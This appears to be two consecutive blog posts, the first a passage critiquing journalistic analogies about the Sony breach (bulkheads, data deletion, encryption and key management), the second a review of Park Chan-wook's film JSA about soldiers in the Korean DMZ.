I covered this in my keynote presentation for the 2010 RSA Conference in London. Actually, I wasn’t expecting to be a keynote and packed my talk with details. Then I found myself on main stage, speaking right after Richard Clarke, which made it awkward to fit in my usual pace of delivery. Anyway, here’s a key slide of the keynote.

The bulkheads gave a false sense of confidence, allowing a greater disaster to unfold for a combination of reasons. See how “wireless issues” and “warnings ignored” and “continuing to sail” and “open on top” start to add up? In other words if you hit something and detect a leak you tend to make an earlier assessment and a more complete one — one that affects the whole ship. If you instead think “we’ve got bulkheads keep going” a leak that could be repaired or slowed turns very abruptly into a terminal event, a sinking.

Clearly Sony had been breached in one of their bulkheads already. We saw the Playstation breach in 2011 have dramatic and devastating impact. Sony kept sailing, probably with warnings ignored elsewhere, communications issues, and thinking improvements in one bulkhead area of the company was sufficient. Another breach devastated them in 2013 and they continued along…so perhaps you can see how bulkheads are a tool that offer great promise yet require particular management to be effective. Bulkheads all by themselves are not a “need”. Like a knife, or any other tool that makes defense easier, what people “need” is to learn how to use them properly — keep the pointy side in the right direction.

Another way of looking at the problem

The rest of the article runs through a mix of several theories.

One theory mentioned is to delete data to avoid breaches. This is good specific advice, not good general advice. If we were talking about running out of storage room people may look at deletion as a justified option. If the data is not necessary to keep and carries a clear risk (e.g. post-authorization payment card data fines) then there is a case to be made. And in the case of regulation then the data to be deleted is well-defined. Otherwise deleting poorly-defined data actually can make things worse through rebellion.

A company tells its staff that the servers will be purging data and you know what happens next? Staff start squirreling away data on every removable storage devices and cloud provider they can find because they still see that data as valuable, necessary to be successful, and there’s no real penalty for them. Moreover, telling everyone to delete email that may incriminate is awkward strategy advice (e.g. someone keeps a copy and you delete yours, leaving you without anything to dispute their copy with). Also it may be impossible to ask this of environments where data is treated as a formal and permanent record. People in isolation could delete too much or the wrong stuff, discovered too late by upper management. Does that risk outweigh the unknown potential of breach? Pushing a risk decision away from the captain of a ship and into bulkheads without good communication can lead to Titanic miscalculations.

Another theory offered is to encrypt and manage keys perfectly. Setting aside perfect anything management, encryption is seriously challenged by an imposter event like Sony. A person inside an environment can grab keys. Once they have the keys they have to be stopped by a requiring other factors of identification. Asking the imposter to provide something they have or something they are is where the discussion often will go — stronger authentication controls both to prevent attacks spreading and also to help alert management to a breach in progress. Achieving this tends to require better granularity in data (fewer bulkheads) and also more of it (fewer deletions). The BBC correctly pointed out that there is balance yet by this point the article is such a mess they could say anything in conclusion.

What I am saying here is think carefully about threats and solutions if you want to manage them. Do not settle on glib statements that get repeated without much thought or explanation, let alone evidence. Containment can work against you if you do not manage it well, adding cost and making a small breach into a terminal event. A boat obviously will use any number of technologies, new and old, to keep things dry and productive inside. A lot of what is needed relates to common sense about looking and listening for feedback. This is not to say you need some super guru as captain; rather it is the opposite. You need people committed to improvement, to reporting things are not as they should be, in order to achieve a well-run ship.

Those are just some quick examples above and how I would position things differently. Nation-states are not always in a better position. Often they are hindered. Attackers have weaknesses and commitments. Finding a way to make them stop is not impossible. And ultimately, throwing around analogies is GREAT as long as they are not incomplete or applied incorrectly. Hope that helps clarify how to use a little common sense to avoid errors being made in journalist stories on the Sony breach.

A South Korean soldier slowly hands a shiny mechanical lighter to a North Korean soldier, as if to give thanks through transfer of better technology. The North Korean lights a cigarette and contemplates the object. The South Korean clarifies its value as “you can see yourself in the reflection; see how clean your teeth are”. This movie is full of clever and humorous juxtapositions, similar to questioning urban liberal versus rural conservative values.

The area known as JSA (Joint Security Area) is a small section of the Demilitarized Zone (DMZ) between North and South Korea. The two countries have their military stationed literally standing face-to-face just a few feet from each other. Buildings in the area have served as meeting space, brokered by international oversight, and there is palpable tension in the air.

This movie draws the viewer into this feeling and the lives of soldiers suspended by two countries within an old armistice and trying to find ways around it; men and women trapped inside an internationally monitored agreement to postpone hostilities. Primary roles are played by just four soldiers, two North and two South. Also stepping up to the dance are the investigators and observers, positioned in an awkward third role between the two sides.

The NNSC (Neutral Nations Supervisory Commission) and the US have a dominant secondary tier of influence to the dialogue. I found no mention of other global players, such as China or Russia. Perhaps the absence of these countries is explained by the fact this movie was released in 2000. Today it might be a different story.

Directed by Park Chan-wook the cultural perspective and references clearly are South Korean. North Korea is portrayed in a surprising light as the more thoughtful and grounded of the two countries. While the South is shown to be obsessed with shallow perfections, looking at itself and boasting about false success, roles played by the North are either weary and wise or kind and naive. It is the US and UN that come out being the real villains in the script, perpetuating a civil war that would heal if only allowed by outside meddlers.

What comes across to me is a third-generation war movie; a Tarantino-syle M*A*S*H. There is a strong pacifist-irony thread, clearly influenced by Tarantino’s style of borrow and remix old scenes from popular war/gangster movies using today’s direct approach. No subtlety will be found. The viewer is granted displays of full-gore slow-motion blood-splattering scenes of useless death, the sort of lens Tarantino developed as he grew up working in a Los Angeles video-rental store. John Wayne, for example, is played by the North Korean sergeant…

Chan-wook is quoted saying his movies highlight “the utter futility of vengeance and how it wreaks havoc on the lives of everyone involved”.

Despite the gore and sometimes strained irony, the film is suspenseful and on-target with much of its commentary. It offers a counter-intuitive story that veers uncomfortably close to glorifying the North and vilifying the US, delivering over-simplifications of civil war. This is exactly the sort of popular cartoonist perspective many of us need to take into consideration, forcing a rethink of how “the dark side” is portrayed. If Marvel were to dream up a superhero of South Korean origin, it may have more shades of this plot than anything a US director would ever allow.

I give it four out of an unspecified number of penguins.